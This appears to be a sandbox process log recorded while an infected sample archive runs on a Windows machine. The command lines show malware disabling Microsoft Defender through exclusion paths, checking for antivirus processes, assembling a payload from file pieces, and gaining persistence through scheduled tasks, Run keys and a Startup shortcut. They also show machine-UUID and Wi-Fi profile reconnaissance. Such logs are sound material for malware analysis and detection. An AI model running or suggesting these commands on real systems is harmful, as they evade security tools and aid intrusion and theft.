"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TPB-1.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TestExe.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\TestExe.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\x.exe'

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\PDFReader.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\PDFReader.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe"

C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp

"C:\Users\Admin\AppData\Local\Temp\is-B9IG3.tmp\stories.tmp" /SL5="$10446,3312183,56832,C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\stories.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe'

C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe

"C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe" -i

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update (32bit).exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update (32bit).exe'

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Loader.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\KillingInstructional.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Hazards Hazards.cmd && Hazards.cmd

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa opssvc"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 33988

C:\Windows\SysWOW64\findstr.exe

findstr /V "EmergencyAdaptedResearchOrdinaryHeatherSuspendedHospitalsScanner" Cancer

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b ..\Oe + ..\Increases + ..\Independently + ..\Devon + ..\Hotels + ..\Automobile + ..\Albany + ..\Georgia + ..\Guess + ..\Funeral w

C:\Users\Admin\AppData\Local\Temp\33988\Paintball.com

Paintball.com w

C:\Windows\SysWOW64\choice.exe

choice /d y /t 5

C:\Windows\SysWOW64\cmd.exe

cmd /c schtasks.exe /create /tn "Mon" /tr "wscript //B 'C:\Users\Admin\AppData\Local\Secure360 Innovations\Securify360.js'" /sc minute /mo 5 /F

C:\Windows\SysWOW64\cmd.exe

cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Securify360.url" & echo URL="C:\Users\Admin\AppData\Local\Secure360 Innovations\Securify360.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Securify360.url" & exit

C:\Windows\SysWOW64\schtasks.exe

schtasks.exe /create /tn "Mon" /tr "wscript //B 'C:\Users\Admin\AppData\Local\Secure360 Innovations\Securify360.js'" /sc minute /mo 5 /F

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\system32.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f"

C:\Windows\system32\reg.exe

reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f"

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Amadeus.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ffdfc733cb8,0x7ffdfc733cc8,0x7ffdfc733cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1900 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=2344 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --service-sandbox-type=utility --mojo-platform-channel-handle=2604 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4668 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4892 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4636 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=4976 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=5904 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --service-sandbox-type=utility --mojo-platform-channel-handle=5420 /prefetch:8

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\fcxcx.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\fcxcx.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Update.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Update.exe"

C:\Windows\system32\svchost.exe

"C:\Windows\system32\svchost.exe"

C:\Windows\system32\audiodg.exe

"C:\Windows\system32\audiodg.exe"

C:\Windows\system32\msiexec.exe

"C:\Windows\system32\msiexec.exe"

C:\Users\Admin\AppData\Local\Temp\4F5E.tmp.ssg.exe

"C:\Users\Admin\AppData\Local\Temp\4F5E.tmp.ssg.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,12123752832257658360,3092329982137917790,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:1

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Client-built.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\Client-built.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "MS Build Tools" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe

"C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "MS Build Tools" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\6C4F.tmp.zx.exe

"C:\Users\Admin\AppData\Local\Temp\6C4F.tmp.zx.exe"

C:\Users\Admin\AppData\Local\Temp\6C4F.tmp.zx.exe

"C:\Users\Admin\AppData\Local\Temp\6C4F.tmp.zx.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-http2 --use-spdy=off --disable-quic

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdfc29cc40,0x7ffdfc29cc4c,0x7ffdfc29cc58

C:\Windows\system32\BackgroundTransferHost.exe

"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --disable-http2 --use-spdy=off --disable-quic

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffdfc733cb8,0x7ffdfc733cc8,0x7ffdfc733cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2068 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --service-sandbox-type=none --disable-quic --disable-http2 --mojo-platform-channel-handle=2144 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --service-sandbox-type=utility --disable-quic --disable-http2 --mojo-platform-channel-handle=2780 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --service-sandbox-type=none --disable-quic --disable-http2 --mojo-platform-channel-handle=4764 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4180 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --service-sandbox-type=none --disable-quic --disable-http2 --mojo-platform-channel-handle=5516 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --service-sandbox-type=none --disable-quic --disable-http2 --mojo-platform-channel-handle=5200 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --service-sandbox-type=utility --disable-quic --disable-http2 --mojo-platform-channel-handle=3732 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:1

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\main.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\main.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\tmp.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\tmp.exe"

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\main.exe

"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\main.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c mode con: cols=125 lines=35

C:\Windows\system32\mode.com

mode con: cols=125 lines=35

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\System32\wbem\WMIC.exe

C:\Windows\System32\wbem\WMIC.exe csproduct get UUID

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4604 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2036,2555080802976765850,14444911904089975277,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

